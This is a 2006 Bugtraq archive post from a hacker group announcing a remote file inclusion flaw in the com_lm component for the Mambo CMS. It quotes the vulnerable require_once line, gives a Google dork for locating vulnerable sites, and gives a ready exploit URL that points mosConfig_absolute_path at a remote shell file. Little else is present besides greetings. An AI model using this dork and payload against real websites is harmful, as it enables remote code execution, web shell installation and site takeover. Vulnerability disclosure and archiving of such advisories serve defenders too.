Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Mambo com_lm component (archive.php) Remote File Include Vulnerabilities

From: crackers_child () sibersavascilar com
Date: 16 Aug 2006 09:36:11 -0000
!!!!!!!!!WWW.SiBERSAVASCiLAR.COM!!!!!!!!!
--------------------------------------------------------------------------------

Title : Mambo com_lm component (archive.php) Remote File Include Vulnerabilities

--------------------------------------------------------------------------------
#Author: Crackers_Child


#cont@ct: crackers_child () sibersavascilar com

--------------------------------------------------------------------------------

Google Dorks  : inurl:"/com_lm/"

------------------------- -------------------------------------------------------

Application :  com_lm Component of Mambo

--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
Bug

in archive.php
--
// Change the $LM_PATH variable in the eu_config.inc.php file in this directory.
require_once($GLOBALS['mosConfig_absolute_path']."/components/com_lm/public_config.inc.php"); 
--
--------------------------------------------------------------------------------

Exploit:

http://[target]/[mambo_path]/components/com_lm/archive.php?mosConfig_absolute_path=Shell.txt?

--------------------------------------------------------------------------------

greets:

X_ALPEREN_X,Root_MOr And All Other Friends

--------------------------------------------------------------------------------



--------------------------------- [ WWW.SiBERSAVASCiLAR.COM ] --------------------------------------
Previous By Date Next
Previous By Thread Next

Current thread: